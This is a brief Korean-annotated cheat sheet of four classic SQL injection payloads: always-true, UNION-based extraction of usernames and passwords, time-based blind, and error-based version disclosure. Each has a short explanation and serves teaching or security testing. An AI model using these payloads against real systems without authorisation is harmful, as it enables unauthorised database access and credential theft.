SQL Injection Payloads

1. 기본 조건문 삽입

' OR '1'='1

항상 참이 되는 조건을 추가하여 모든 레코드를 반환하도록 함.


2. UNION-based SQLi

' UNION SELECT username, password FROM users --

다른 테이블에서 데이터를 추출하기 위해 사용됨. 주석(--)을 사용해 나머지 쿼리를 무시함.


3. Time-based Blind SQLi

' OR IF(1=1, SLEEP(5), 0) --

조건이 참일 때 지연 시간(이 경우 5초)을 추가하여 응답 시간을 통해 데이터베이스의 정보를 유추하는 데 사용됨.


4. Error-based SQLi

' AND 1=CAST((SELECT @@version) AS int) --

CAST 함수를 사용하여 데이터베이스의 버전 정보를 정수형으로 변환하려고 시도함. 쿼리 실행 시 오류가 발생하면 오류 메시지에 포함된 정보로 데이터베이스 버전을 알 수 있음.